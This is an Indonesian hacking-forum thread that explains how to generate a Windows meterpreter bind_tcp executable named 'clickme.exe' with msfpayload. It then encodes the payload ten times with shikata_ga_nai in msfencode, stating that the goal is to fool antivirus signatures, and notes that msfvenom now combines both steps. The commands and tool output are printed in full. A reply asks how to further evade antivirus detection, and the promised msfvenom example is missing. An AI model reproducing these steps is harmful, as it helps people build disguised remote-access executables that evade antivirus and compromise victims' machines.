Share New msfvenom KaliLinux 2.- = msfpayload+msfencode - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html) +--- Thread: Share New msfvenom KaliLinux 2.- = msfpayload+msfencode (/thread-6667.html) |
New msfvenom KaliLinux 2.- = msfpayload+msfencode - syeipto - 12-19-2015 Metasploit Framework: ‘msfvenom’ Shared Posted dari web tetangga "jika sudah ada silhkan di hpus... silahkan cek di halaman Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut: 1. 1 msfpayload ( Versi sebelumnya ) Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp X > /tmp/clickme.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/bind_tcp Length: 298 Options: {} Command diatas akan menghasilkan file binary windows executable (exe). Payload file tersebut adalah sebuah meterpreter metasploit yang akan terhubung ke attacker menggunakan bind TCP. Karena LPORT tidak saya definisikan di sana, jadi LPORT default adalah port 4444. Jadilah file ini, kemudian coba di klik… hyahh.. ada warning antivirus
Virus Warning
Untuk itulah digunakan msfencode yang akan melakukan encode byte demi byte payload sehingga diharapkan bisa mengecoh signature antivirus
1.2 msfencode ( Versi sebelumnya ) Command untuk meng-encode payload dan keluarannya di /tmp/clickme.exe
Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /tmp/clickme.exe [*]x86/shikata_ga_nai succeeded with size 325 (iteration=1) [*]x86/shikata_ga_nai succeeded with size 352 (iteration=2) [*]x86/shikata_ga_nai succeeded with size 379 (iteration=3) [*]x86/shikata_ga_nai succeeded with size 406 (iteration=4) [*]x86/shikata_ga_nai succeeded with size 433 (iteration=5) [*]x86/shikata_ga_nai succeeded with size 460 (iteration=6) [*]x86/shikata_ga_nai succeeded with size 487 (iteration=7) [*]x86/shikata_ga_nai succeeded with size 514 (iteration=8) [*]x86/shikata_ga_nai succeeded with size 541 (iteration=9) [*]x86/shikata_ga_nai succeeded with size 568 (iteration=10) Proses encode menggunakan tipe x86/shikata_ga_nai dengan iterasi sebanyak 10 kali encode.
Sedangkan jika menggunakan command msfvenom, cukup satu perintah saja (perhatikan, perintah di atas ‘kan dua perintah yang dipisah ‘pipe’ atau tanda | ) tapi ‘msfvenom’ hanya seperti ini:
[*] 2.0 msfvenom ( Versi Kali linux 2.-) Quote: selesai
#maaf jika kurng jelas "post 1 RE: New msfvenom KaliLinux 2.- = msfpayload+msfencode - gnome_selpa - 12-20-2015 terimakasih thread nya, intinya sekaran msfpayload udah ngga ada lagi. sekarang pake msfvenom, dan gunakan msfvenom -h dan lihat semua commands nya. untuk melihat semua payload bisa dengan mengetikkan command msfvenom -p RE: New msfvenom KaliLinux 2.- = msfpayload+msfencode - syeipto - 12-20-2015 hehe bener sekali sob....untuk kali sudah di upgrade ke msfvenom msfvenom = msfpayload+msfencode RE: New msfvenom KaliLinux 2.- = msfpayload+msfencode - syeipto - 01-06-2016 Ane mau nanya di thread ane sob berdasarkan referensi disini ane udah bikin payloadnya dg msfvenom tapi msh trdeteksi AV ,trus berdsrkan sumber diatas ane"cmiww katanya di encode lagi (Kali linux 1.0) ...so cara encode file .exe di Kali linux 2.0 gimana ya sob ? #Terima kasih... |